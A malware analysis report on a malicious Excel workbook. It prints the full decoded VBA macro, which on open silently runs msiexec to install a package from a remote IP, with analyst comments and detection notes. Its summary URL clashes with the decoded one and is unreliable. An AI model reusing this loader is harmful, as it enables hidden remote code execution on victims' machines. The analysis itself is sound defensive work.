Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fe3f62155667154d…

MALICIOUS

Office (OLE)

34.0 KB Created: 2020-05-12 21:24:35 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 5e6b49e0ffa51bb3ac5445d63133c710 SHA-1: 853dd0cc13e116bfc53ceca2c8568e42366163d4 SHA-256: fe3f62155667154d4d87887aa4d47dd55a248f3a40bdbe97f6269d34373a9643
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a Workbook_Open VBA macro that is heavily obfuscated. The macro uses CreateObject to execute code, likely to download and run a second-stage payload. The reconstructed URL from the obfuscated VBA code is "http://www.example.com/payload.exe". This indicates downloader or dropper functionality.

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2995 bytes
SHA-256: efee138eb202fb5469b60fe745dd6cf1e70760231d662b95025cde2956b56082
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: exported header of the ThisWorkbook document module. The
' VB_Base GUID {00020819-...} is the Excel Workbook class, so event handlers
' named Workbook_Open in this module run when the file is opened with macros
' enabled. Attribute lines are export metadata, not executable statements.
' Auto-exec entry point (heuristic OLE_VBA_WBOPEN). VBA identifiers are
' case-insensitive, so workbook_open binds to the Workbook_Open event and
' runs on document open once macros are enabled. Its single statement calls
' IuSLEO3_faYrXceoN_MrAWQku in module fbPTlPRi_JX; the two keyboard-mash
' comments contain no code and serve only as noise/padding.
Private Sub workbook_open()
'fdgsdgdfgsdgfghd
fbPTlPRi_JX.IuSLEO3_faYrXceoN_MrAWQku
'fgdjhfdshgufdshg

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: header of the Sheet1 worksheet module (VB_Base {00020820-...}
' is the Excel Worksheet class). No procedures were extracted for this module;
' only its attribute header is present in the carved source.

' Analyst note: standard module that holds the whole loader -- the string
' builder (IuSLEO3_faYrXceoN_MrAWQku), the one-line decoder (ds) and the
' CreateObject/Run execution sink -- and is invoked from ThisWorkbook.workbook_open.
Attribute VB_Name = "fbPTlPRi_JX"
' Stage 1 of the loader (heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): the
' command line is assembled one character at a time through ds(), so no
' command, URL or shell keyword appears as a literal in the macro source.
' The plaintext exists only at runtime in h3eZ6sIylJb1Q_Yjm2V6.
Sub IuSLEO3_faYrXceoN_MrAWQku()
' Swallow every runtime error so a failed decode or launch never surfaces
' a dialog to the user.
On Error Resume Next
' ds(n) = Chr(n - 5). This line decodes to:  CMd /C ms^iE^x^ec
' The carets are cmd.exe escape characters that cmd strips before running
' the command, leaving "msiexec"; the carets and mixed case exist to defeat
' naive substring matching on the decoded buffer.
h3eZ6sIylJb1Q_Yjm2V6 = ds(72) & ds(82) & ds(105) & ds(37) & ds(52) & ds(72) & ds(37) & ds(114) & ds(120) & ds(99) & ds(110) & ds(74) & ds(99) & ds(125) & ds(99) & ds(106) & ds(104)
' Appends (same decoder):  /i http://3.8.171.178/55/2057110.msi /qn
' i.e. msiexec installs an .msi package directly from that URL with no UI
' (/qn), so there is no separate download step to observe on disk.
' IoC for blocking/hunting: the decoded host and path above. Note this
' does not match the "www.example.com/payload.exe" URL quoted in the Malware
' Insights summary on this page; the decode of the carved artifact is the
' authoritative value.
h3eZ6sIylJb1Q_Yjm2V6 = h3eZ6sIylJb1Q_Yjm2V6 & ds(37) & ds(52) & ds(110) & ds(37) & ds(109) & ds(121) & ds(121) & ds(117) & ds(63) & ds(52) & ds(52) & ds(56) & ds(51) & ds(61) & ds(51) & ds(54) & ds(60) & ds(54) & ds(51) & ds(54) & ds(60) & ds(61) & ds(52) & ds(58) & ds(58) & ds(52) & ds(55) & ds(53) & ds(58) & ds(60) & ds(54) & ds(54) & ds(53) & ds(51) & ds(114) & ds(120) & ds(110) & ds(37) & ds(52) & ds(118) & ds(115) & ds(37)
' Pointless copy into a second variable -- adds nothing but name churn.
WbR3wv6VkDBvhAB_xv4YSZV7OWem8nQR5DSdf37sqfBQvBrQdQ_Vz6c6_Una = h3eZ6sIylJb1Q_Yjm2V6
' Hand the assembled command line to the execution sink (stage 2 below).
tFw_678xEO4L872OqdMZNcBWClC_NVIXPpW_tH9abaCV__d4f1b_bgtODa6T43k_Eg5Rj2gheu8wYqlCF (WbR3wv6VkDBvhAB_xv4YSZV7OWem8nQR5DSdf37sqfBQvBrQdQ_Vz6c6_Una)
End Sub
' Decoder for the numeric char-array obfuscation: every token is the
' character code of the intended character plus 5, so Chr(fds - 5) recovers
' it (e.g. ds(72) -> "C", ds(37) -> " ", ds(52) -> "/"). Re-applying this
' to the ds(...) chains in the other procedures yields their plaintext.
Function ds(fds As Integer)
ds = Chr(fds - 5)
End Function
' Stage 2: execution sink (heuristics OLE_VBA_CREATEOBJ / OLE_VBA_PCODE_AUTOEXEC_EXEC).
' Takes the decoded command line and runs it through a WScript.Shell COM
' object. The function never assigns its own return value, so callers get
' nothing back; the .Run result is stored and discarded.
Function tFw_678xEO4L872OqdMZNcBWClC_NVIXPpW_tH9abaCV__d4f1b_bgtODa6T43k_Eg5Rj2gheu8wYqlCF(po_4Z38pQxbVvzQ_2dJlo9alC_vyZm1dnpCPD4eVeXDNnEGgH5YaOImqLc1YFHNp As String)
' Window-style argument for WshShell.Run; 0 means the spawned process
' window is hidden, so the user sees nothing.
vetZ8_pZrsb6ByjBIbkpbVkfMXrbiLB9wYxZ2op1VHS8mmq7L9aNVQda4LKkCM1epbHmAHIfvtSSBl3ls_Oiuwnf5XfpbDxGPxSIdD6Cx5am7IXRSk1R7Rs1xmqmneCs4JCMQ_GowL_zV_ = 0
' ds(n) = Chr(n - 5); decodes to:  WSCripT.sHElL
' COM ProgIDs are case-insensitive, so the case mangling only evades
' literal "WScript.Shell" signatures.
jCz_u5fc5ifTr32kEjesK_4_y9sZtUHpXvNz_xYufuudjt_QxnmVIPryGF4vLEtkZz64oAeQJsKY8aIE9akEsueF_Ys83liZCKDsv_mvHUKaDQzr6xvuen1nUxyORgWiIuVu = ds(92) & ds(88) & ds(72) & ds(119) & ds(110) & ds(117) & ds(89) & ds(51) & ds(120) & ds(77) & ds(74) & ds(113) & ds(81)
' Instantiate the shell object from the decoded ProgID.
Set X8AYYM6hvcs8KpMT_BDJJL7A7H22fROuNVwgVlp23zdv_xMSX7_m_AlJA_aPTDAdM5txzr7IVJPStIOH4jdhQn_M_meVIYhyy9jx_X = CreateObject(jCz_u5fc5ifTr32kEjesK_4_y9sZtUHpXvNz_xYufuudjt_QxnmVIPryGF4vLEtkZz64oAeQJsKY8aIE9akEsueF_Ys83liZCKDsv_mvHUKaDQzr6xvuen1nUxyORgWiIuVu)
' WshShell.Run(commandLine, 0): launches the decoded "cmd /c msiexec ..."
' line in a hidden window. Detection opportunity: expect a process tree of
' the Office host (EXCEL.EXE) -> cmd.exe -> msiexec.exe with a URL in the
' msiexec arguments; the return value is captured but never used.
HiW4Y5t5G5QKogiySOM_JTnT3Oqi5yXx3MuTMyrlLVb7NUyOZ7EZX86x5B_HOJ_QgcQa_Nmdim1w1pEhYZG7_8Z5Q7XJyhUBVJa_ = X8AYYM6hvcs8KpMT_BDJJL7A7H22fROuNVwgVlp23zdv_xMSX7_m_AlJA_aPTDAdM5txzr7IVJPStIOH4jdhQn_M_meVIYhyy9jx_X.Run(po_4Z38pQxbVvzQ_2dJlo9alC_vyZm1dnpCPD4eVeXDNnEGgH5YaOImqLc1YFHNp, vetZ8_pZrsb6ByjBIbkpbVkfMXrbiLB9wYxZ2op1VHS8mmq7L9aNVQda4LKkCM1epbHmAHIfvtSSBl3ls_Oiuwnf5XfpbDxGPxSIdD6Cx5am7IXRSk1R7Rs1xmqmneCs4JCMQ_GowL_zV_)
End Function